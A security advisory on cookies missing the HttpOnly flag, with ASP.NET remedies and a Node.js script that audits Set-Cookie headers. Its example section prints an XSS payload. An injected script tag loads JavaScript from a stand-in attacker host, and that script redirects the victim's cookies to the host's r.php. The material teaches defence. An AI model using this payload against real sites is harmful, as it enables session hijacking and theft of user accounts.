During a Cross-site Scripting attack, script injected into the page runs with the origin of the vulnerable site, so it can read the victim's cookies through document.cookie. If the session cookie is among them, the attacker can send it to a server under their control and hijack the victim's session.
Example
A user opens a newsletter e-mail. The HTML below is placed where an image tag is expected; the broken-out script tag loads JavaScript from the attacker's server (1.2.3.4:81 in this example) into the client's browser. The loaded script follows the HTML.
HTML Code:
<img src=""http://www.a.com/a.jpg<script type=text/javascript src="http://1.2.3.4:81/xss.js">" /><img src="http://www.a.com/a.jpg</script>"/>
Javascript Code:
window.location = "http://1.2.3.4:81/r.php?u=" + document.links[1].text   // text of the second link on the page
    + "&l=" + document.links[1]                                            // its href (the page the victim is on)
    + "&c=" + document.cookie;                                             // every cookie readable by script, session cookie included
Remedy
Cookies should be marked as HttpOnly. HttpOnly cookies cannot be read by client-side scripts (document.cookie does not return them), so marking the session cookie HttpOnly defeats the cookie-theft payload shown above. This is an additional layer of protection against Cross-site Scripting, not a fix for it: script that runs in the victim's browser can still issue requests that carry the cookie automatically, so the injection itself must also be removed.
Below you can find some implementation examples:
If you use the default ASP.NET Membership provider, you can mark the cookies from web.config. The httpCookies element sets the default for cookies ASP.NET issues; requireSSL="true" additionally marks them Secure so they are only sent over HTTPS. The compilation element is shown only for context, and debug should be "false" in production:
<system.web>
  <compilation debug="true" targetFramework="4.0" />
  <httpCookies httpOnlyCookies="true" requireSSL="true" />
</system.web>
If you create cookies from code, you can use the following property of the cookie object:
HttpCookie cookie = new HttpCookie(Config.CookieName, id);
cookie.Path = "/";
cookie.HttpOnly = true;   // <-- burned in: client-side script can no longer read this cookie
return cookie;
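The check a practitioner would run against a site's responses, as an added example that is not part of the original page and is not ASP.NET code: a small Node.js audit that parses Set-Cookie headers, reports cookies missing HttpOnly (and, by default, Secure), shows exactly what the injected script's document.cookie would have returned, and builds the header a hardened session cookie should carry. The sample headers, the cookie names and the SameSite=Lax choice are assumptions for illustration, not something the page prescribes.

```javascript
// Added example, not from the original page: audit Set-Cookie headers the way a
// scanner would, and show which cookies an XSS payload could read.
// The sample headers below are constructed, not captured from a real site.

// Parse one Set-Cookie header into its name, value and the two attributes that matter here.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [nameValue, ...attrs] = parts;
  const eq = nameValue.indexOf('=');
  const name = eq === -1 ? nameValue : nameValue.slice(0, eq);
  const value = eq === -1 ? '' : nameValue.slice(eq + 1);
  // Attribute names are case-insensitive; "HttpOnly" and "Secure" carry no value.
  const flags = new Set(attrs.map((a) => a.split('=')[0].trim().toLowerCase()));
  return { name, value, httpOnly: flags.has('httponly'), secure: flags.has('secure') };
}

// Report every cookie that lacks HttpOnly (readable via document.cookie) and,
// unless requireSecure is false, every cookie that lacks Secure (sent over plain HTTP).
function auditSetCookieHeaders(headers, { requireSecure = true } = {}) {
  const findings = [];
  for (const header of headers) {
    const c = parseSetCookie(header);
    if (!c.httpOnly) findings.push({ cookie: c.name, issue: 'missing HttpOnly' });
    if (requireSecure && !c.secure) findings.push({ cookie: c.name, issue: 'missing Secure' });
  }
  return findings;
}

// What the injected script's document.cookie would return for these headers:
// only cookies without HttpOnly, joined as "name=value; name=value".
function scriptVisibleCookies(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// The header an application should emit for a session cookie.
// SameSite=Lax is an assumed extra hardening choice, not something the page prescribes.
function hardenedCookieHeader(name, value) {
  return `${name}=${value}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Constructed sample response headers (hypothetical values).
const SAMPLE_HEADERS = [
  'ASP.NET_SessionId=abc123; path=/',                    // exposed to script and to plain HTTP
  '.ASPXAUTH=def456; path=/; HttpOnly',                  // hidden from script, still sent over HTTP
  'prefs=dark; path=/; Secure; HttpOnly; SameSite=Lax',  // hardened
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditSetCookieHeaders(SAMPLE_HEADERS));
  console.log('document.cookie would expose:', JSON.stringify(scriptVisibleCookies(SAMPLE_HEADERS)));
  console.log(hardenedCookieHeader('ASP.NET_SessionId', 'abc123'));
}
```

Run with `node audit.js` against headers copied from a response, or call `auditSetCookieHeaders(res.headers['set-cookie'])` on a captured response. In a Node application the corrected header is emitted with `res.setHeader('Set-Cookie', hardenedCookieHeader(name, value))`; in ASP.NET the same result comes from the web.config or HttpCookie settings above. The audit reports the first sample cookie twice, once for each missing attribute, and `scriptVisibleCookies` shows that only that cookie would reach the attacker's r.php.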